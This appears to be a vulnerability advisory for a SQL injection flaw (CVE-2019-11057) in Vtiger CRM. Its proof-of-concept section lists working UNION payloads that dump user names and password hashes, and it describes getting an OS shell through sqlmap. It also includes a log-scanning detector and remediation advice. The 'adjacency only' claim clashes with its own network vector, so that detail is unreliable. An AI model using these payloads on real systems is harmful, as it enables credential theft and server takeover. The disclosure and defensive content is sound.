Securin Zero Days

High · CVSS 8.8 · Patched · EPSS 0.00565%

    SQL Injection in Vtiger CRM

    SQL injection vulnerability in Vtiger CRM before 7.1.0 hotfix3 allows authenticated users to execute arbitrary SQL commands.

CVE ID: CVE-2019-11057
CVSS v3.1: 8.8 High
Vendor: Vtiger
CWE: CWE-89
Disclosed: Apr 3, 2019
Status: Fixed
    01/Description

    What this actually is.

    Technical background, root cause, and affected surface.

SQL injection (SQLi) is an injection attack in which attacker-supplied input is interpreted as part of a SQL statement, letting the attacker execute SQL of their choosing against the database server behind a web application.

Vendor: Vtiger
Affected Product: Vtiger CRM
CVE: CVE-2019-11057
Securin ID: 2019-CSW-10-25
Status: Fixed
Date: April 3, 2019
Severity: High
CVSS Score: 8.8
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
    02/Proof of Concept

From one request to root shell.

    Reproduced in a sandboxed environment. Requires only LAN or WiFi adjacency.

CVSS 3.1: 8.8
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Scope: Unchanged
Impact: C:H / I:H / A:H
Severity: High

PoC · Exploitation Steps
Figure 1: Testing if the src_record parameter is vulnerable to SQLi with a single quotation mark (').
Note: The figure shows that the query was unsuccessful, and the length of the response is 9,690 bytes.

Figure 2: Testing if the src_record parameter is vulnerable to SQLi with two single quotation marks ('').
Note: The figure shows that the query was successful, and the length of the response is 10,957 bytes, verifying that the parameter is vulnerable to SQL injection.

Figure 3: Checking the version of the SQL database by exploiting SQLi.
Query used: -3096 union select 100' UNION ALL SELECT version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IJXL

Figure 4: Finding the name of the current database.
Query used: -3096 union select 100' UNION ALL SELECT database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IJXL

Figure 5: Finding tables in the current database.
Query used: -3096 union select 100' UNION ALL SELECT group_concat(table_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.tables where table_schema=database()-- IJXL

Figure 6: Finding names of columns in the vtiger_users table.
Query used: -3096 union select 100' UNION ALL SELECT group_concat(column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name="vtiger_users"-- IJXL

Figure 7: Extracting data from the vtiger_users table.
Query used: -3096 union select 100' UNION ALL SELECT group_concat(id,0x3a,user_name,0x3a,user_password,0x3a,first_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL from vtiger_users-- IJXL

Figure 8: Checking if the current user is a database administrator with sqlmap.

Figure 9: Gaining shell and running OS-level commands using the --os-shell switch in sqlmap.
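Seen from the defender's side, the probe-and-UNION sequence above leaves a distinctive trail in web-server access logs. The following Python, added here and not part of the Securin advisory, parses constructed Common Log Format lines (the request paths, user names and client addresses are assumed) and flags src_record values that are not plain integer record ids, separating the quote probe of Figures 1 and 2 from a UNION payload.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from the advisory). The query strings mirror the
# quote probe and the UNION payload shape from the PoC figures, URL-encoded as sent.
SAMPLE_LOG = """\
10.0.0.5 - alice [03/Apr/2019:10:01:12 +0000] "GET /index.php?module=Contacts&src_record=3096 HTTP/1.1" 200 9690
10.0.0.7 - bob [03/Apr/2019:10:02:40 +0000] "GET /index.php?module=Contacts&src_record=3096%27 HTTP/1.1" 200 9690
10.0.0.7 - bob [03/Apr/2019:10:02:45 +0000] "GET /index.php?module=Contacts&src_record=-3096+union+select+100%27+UNION+ALL+SELECT+version()%2CNULL--+IJXL HTTP/1.1" 200 10957
10.0.0.7 - bob [03/Apr/2019:10:03:01 +0000] "GET /index.php?module=Contacts&src_record=-3096+union+select+100%27+UNION+ALL+SELECT+group_concat(table_name)%2CNULL+from+information_schema.tables--+IJXL HTTP/1.1" 200 10957
"""

# Common Log Format fields used here: client address, authenticated user, request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+)'
)
# SQL structure that can never be part of a numeric record id.
SQLI_RE = re.compile(r"union\s+(all\s+)?select|information_schema|group_concat\s*\(|\bversion\s*\(\s*\)", re.I)

def classify(line):
    """Return (verdict, user, ip) for a suspicious src_record value, or None if the line is clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = dict(parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True))
    if "src_record" not in params:
        return None
    value = params["src_record"]           # parse_qsl has already URL-decoded it
    if value.lstrip("-").isdigit():
        return None                        # the only legitimate shape: an integer record id
    if SQLI_RE.search(value):
        return ("sqli_payload", m["user"], m["ip"])
    if "'" in value:
        return ("quote_probe", m["user"], m["ip"])   # the ' vs '' differential from Figures 1 and 2
    return ("malformed_id", m["user"], m["ip"])

def scan(log):
    """Classify every line of a log and return the non-clean verdicts in order."""
    return [hit for hit in (classify(l) for l in log.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because the authenticated user is part of each verdict, a hit ties the injection attempt back to the low-privilege account (PR:L) it was made from, which is the pivot for the containment steps in the Remediation section.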
    03/Impact

    What an attacker does to you.

    Post-exploitation outcomes mapped to CVSS impact metrics.

Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following types of attack:

    • Reading, updating and deleting arbitrary data/tables from the database

    • Executing commands on the underlying operating system

    04/Remediation

    Fix it. In this order.

    A runbook, not a checklist. Sequence matters — assume compromise before you act.

Use prepared statements with parameterized queries for any SQL query that incorporates user input. With a parameterized query the database parses the statement structure first and receives the user-supplied values separately, so those values can never alter the query's meaning; this removes the SQL injection.

Please refer to the OWASP SQL Injection Prevention Cheat Sheet for more information on how to fix SQL injection: https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.md

    Securin advisory — For coordinated remediation support or threat-actor briefings related to CVE-2019-11057, contact disclose@securin.io
    05/Disclosure Timeline

Vendors moved in days. Attackers in hours.

    Reconstructed from vendor advisories, CISA bulletins, and Securin research records.

Mar 20, 2019: Vulnerability discovered in Vtiger CRM

Apr 03, 2019: Vendor released fix

Apr 09, 2019: CVE assigned

Disclosed 14 days after discovery

    06/References

    Cite, verify, go deeper.

    Primary sources — NVD, CISA KEV, and machine-readable IoC feed.

NVD — CVE-2019-11057: nvd.nist.gov/vuln/detail/CVE-2019-11057

Securin VI — Full Technical Analysis: vi.securin.io
